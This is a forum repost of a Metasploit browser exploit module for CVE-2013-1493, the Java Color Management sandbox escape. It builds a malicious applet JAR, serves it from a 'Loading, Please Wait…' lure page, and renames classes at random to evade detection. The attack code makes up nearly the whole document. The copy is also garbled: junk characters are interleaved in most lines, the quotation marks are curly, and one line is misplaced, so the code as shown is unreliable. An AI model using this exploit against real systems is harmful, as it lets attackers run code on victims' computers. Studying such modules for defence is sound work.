##
7 P8 I, g2 a) s _* L W$ i: [- x2 V0 m# k
# This file is part of the Metasploit Framework and may be subject to
) Z! V6 K9 t, g% \2 e# redistribution and commercial restrictions. Please see the Metasploit
5 [* h+ `1 ]/ S( D! A/ L0 Q# web site for more information on licensing and terms of use.
5 W2 Z" S/ M- M& \# http://metasploit.com/
/ O2 F; o! o9 u* ~) ]/ l- t##
2 B" ~) B4 G$ i( g* z" k1 a1 F) `require ‘msf/core’
5 d, O4 C t( v) B0 W7 erequire ‘rex’8 g2 d6 ]% k) O% }
class Metasploit3 < Msf::Exploit::Remote
- }/ ^& V7 k- p& `3 ~Rank = NormalRanking
! Q0 D, R4 ~' Q8 D! ]) Minclude Msf::Exploit::Remote::HttpServer::HTML- Y, r9 r' ^1 E" z
include Msf::Exploit::EXE7 m% P M2 f( k
include Msf::Exploit::Remote::BrowserAutopwn) s8 G! Q0 G$ D% c8 Z' w% U' o
autopwn_info({ :javascript => false })
; I2 a8 j- S g8 U1 u; }0 adef initialize( info = {} )9 m+ e% z' |3 Q* }2 O; T6 I
super( update_info( info,
' K) ?& ~2 V# p‘Name’ => ‘Java CMM Remote Code Execution’,8 X0 g- Q" N& [# Z: n# \" m
‘Description’ => %q{
0 H/ D' O* q. |; l* _This module abuses the Color Management classes from a Java Applet to run) _- `! G. ]& L& z
arbitrary Java code outside of the sandbox as exploited in the wild in February) G1 d' {6 V2 G) d4 Y5 j% Z
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
# T9 k0 A- r' \% h% y" mand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP15 U$ u3 p- k3 b( F" E5 V) u. ~# a
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java, x) e, L6 G7 U: }
warning in order to run the malicious applet." p6 |$ z9 }: Q. W* v
},
/ T1 Z9 ]% P, W% ^+ n‘License’ => MSF_LICENSE,# f# O, g7 \4 c& p" C, P% l2 R
‘Author’ =>
/ c8 R* d, B$ p'Unknown', # Vulnerability discovery and Exploit* ^: H4 |8 q/ I) B# ~2 w
'juan vazquez' # Metasploit module (just ported the published exploit): N. X* z4 J- L+ {. e' A9 r
],
7 b# D& V5 v# {3 u8 r5 E‘References’ =>
, {& s# n3 b6 V$ ^4 A[
, {7 q/ W( [5 Z" B0 t1 d v3 _0 J[ 'CVE', '2013-1493' ],
- T" {5 u$ |* n3 T[ 'OSVDB', '90737' ],
# @( @. c, M1 L# C: [[ 'BID', '58238' ],1 A5 J8 M# {& u/ q
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],% Z& T1 N: T. _; p+ s
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],- M- \! x) F' J4 P- U9 l w
[ 'URL', 'http://pastie.org/pastes/6581034' ]. d5 [8 L5 `' z
],
$ P; q: V* v1 [2 G2 O" Q1 d% N‘Platform’ => [ 'win', 'java' ],
& Q# o$ h$ l$ G5 g1 T& M‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },2 G! q. i* S6 [. F/ w
‘Targets’ =># \+ j/ M2 h) p Y. h$ R+ B
[# X) J" R$ U2 [# W4 d( b
[ 'Generic (Java Payload)',9 V- O. g- o5 j
{
: T, E% ~5 O2 R3 U6 t8 C& N) ?'Platform' => 'java',
$ u) [0 K$ ]0 g1 x' s'Arch' => ARCH_JAVA
0 _! ^1 N9 _1 T9 t9 ]3 F}9 u7 R5 S! |' t) r, J8 g# r0 K
],0 d u/ g6 M; b/ p5 Z: i: R. _$ b
[ 'Windows x86 (Native Payload)',. n/ q: c9 l6 x s; @
{. }1 ]9 t3 t" N- l9 |* F, O" J
'Platform' => 'win',
& l# N7 q. h/ S'Arch' => ARCH_X86
& c! M- Y# l% `9 Q( u}/ G$ ?/ C6 j5 ?5 d4 p. c3 n+ Z
]
5 Q# z6 O5 h0 Z7 { b. ~7 Q. x5 `" K],
2 f, k3 b. y# o( t8 u‘‘DisclosureDate’ => ‘Mar 01 2013′
1 Q6 t! L) h# @6 W7 Y5 B))
5 Y0 j, v! k$ g2 {1 u6 Vend
' h+ d" n# @* M1 }def setup( v$ D) P/ P1 i1 x2 h; T
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)% w: A" o. k3 o) R! I) C$ z( E, s, U
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# w' R) N! |. Y+ j- w+ I. Z) D
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)8 x8 ~6 y5 w& R. R2 [
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
4 {" S) c. ?$ F5 G$ kpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)3 Q2 X( _* f- d% f9 f" B, z' N
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) P, I: `& M9 U) }" B$ N7 Lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
& z9 V5 S1 v# Q@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 M* z3 C, {: n; v) N@init_class_name = rand_text_alpha(“Init”.length)
1 h, r) Z5 y) J: y0 w@init_class.gsub!(“Init”, @init_class_name)8 m" [' v: [/ _! E& C: J
super+ i% j6 H* r. [. w& _
end
" a6 J. s& q( K2 Udef on_request_uri(cli, request)7 T' I, t* ~6 [2 ~. g$ r5 _# i
print_status(“handling request for #{request.uri}”)' @( p1 F+ |5 [, K8 k. @
case request.uri+ I* O+ E/ s# u8 J& ]0 p% n
when /\.jar$/i; J5 h3 F7 u9 |$ ?, [$ {
jar = payload.encoded_jar* ]; O Z# i K9 g2 i, y
jar.add_file(“#{@init_class_name}.class”, @init_class)
) G8 ?- |$ z* A0 i( N& w w5 ojar.add_file(“Leak.class”, @leak_class)) ^+ z! B2 T* p2 r
jar.add_file(“MyBufferedImage.class”, @buffered_image_class). b1 [; C$ u) d+ w O3 u
jar.add_file(“MyColorSpace.class”, @color_space_class)
" n+ K. p8 n; F# P& H. w; r% t. gDefaultTarget’ => 1,
! p3 P/ w/ L0 ymetasploit_str = rand_text_alpha(“metasploit”.length)
8 r! _4 T4 k ppayload_str = rand_text_alpha(“payload”.length)
( J( f( ]8 E; f4 ^/ Rjar.entries.each { |entry|; ?* c1 |( [, }
entry.name.gsub!(“metasploit”, metasploit_str)
* Y2 |6 a9 o% c4 oentry.name.gsub!(“Payload”, payload_str); ~9 o7 S* X q$ ?
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
# h" Y! \1 { jentry.data = entry.data.gsub(“Payload”, payload_str)# `# G) Q3 \; J4 W3 [
}
& \6 U! O1 F8 _& d6 H8 o, Pjar.build_manifest
$ N {. F9 J0 u" r# f4 R& Lsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })5 S& I, |/ }: M" u/ I9 d h3 z
when /\/$/
; G, Y2 k3 L0 I2 x/ c7 M, ]payload = regenerate_payload(cli)
& U. }4 }+ G! N2 p% O7 M! G4 Uif not payload
6 |# O. i4 O/ R* F# a) M+ u3 x! Rprint_error(“Failed to generate the payload.”)
* g0 K1 H/ w. Ksend_not_found(cli)- Q- q8 C9 V0 q$ m
return
2 i5 X. L& g2 f+ c' ^end) o1 E) i0 r" l/ h! {$ T* J" r/ c( M
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })5 C( q9 j% C6 h" `) w! ^* U
else: f+ m1 a, C0 d8 f- q
send_redirect(cli, get_resource() + ‘/’, ”)
8 a) J: y# p( K1 i/ _5 Kend
p! d4 H% k" |3 f+ {; vend
$ W2 Q$ d% ^3 C5 r5 Gdef generate_html
_2 p& u+ z" \" ]; thtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
& j6 [* \2 M1 i: i" `6 }6 dhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
4 I$ t! F- w# n- rhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|( u/ d/ q; Q! g7 Y6 |
html += %Q|</applet></body></html>|
6 w( f9 t# s/ z3 f6 e: ureturn html
M& o1 @' s/ v* z3 B$ l: Fend
9 W3 I; v) @% `3 {/ S7 Qend' d2 k& L( Q! o- `7 t7 C" F$ D$ I
end8 @7 {; }+ g3 J- c0 t% P& k: r
|
发表于 2013-4-4 17:31:17
收藏
支持
反对